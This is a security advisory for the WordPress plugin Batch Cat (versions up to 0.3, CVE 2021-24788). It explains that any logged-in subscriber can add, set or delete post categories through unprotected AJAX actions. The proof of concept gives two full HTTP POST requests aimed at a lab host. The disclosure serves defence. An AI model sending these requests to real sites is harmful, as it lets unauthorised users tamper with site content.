Batch Cat <= 0.3 – Subscriber+ Arbitrary Categories Add/Set/Delete to Posts | CVE 2021-24788

Description

The plugin defines 3 custom AJAX actions, which both require authentication but are available for all roles. As a result, any authenticated user (including simple subscribers) can add/set/delete arbitrary categories to posts.

Proof of Concept

Set the category 107 to the post 1537:

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://wp.lab/wordpress/wp-admin/tools.php?page=batch-cat%2Fadmin.php
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 50
Origin: http://wp.lab
Connection: close
Cookie: [any authenticated user]

action=bcat_set_category&post_ids=1537&cat_ids=107


Delete the category 107 from the post 1537:

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://wp.lab/wordpress/wp-admin/tools.php?page=batch-cat%2Fadmin.php
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 50
Origin: http://wp.lab
Connection: close
Cookie: [any authenticated user]

action=bcat_del_category&post_ids=1537&cat_ids=107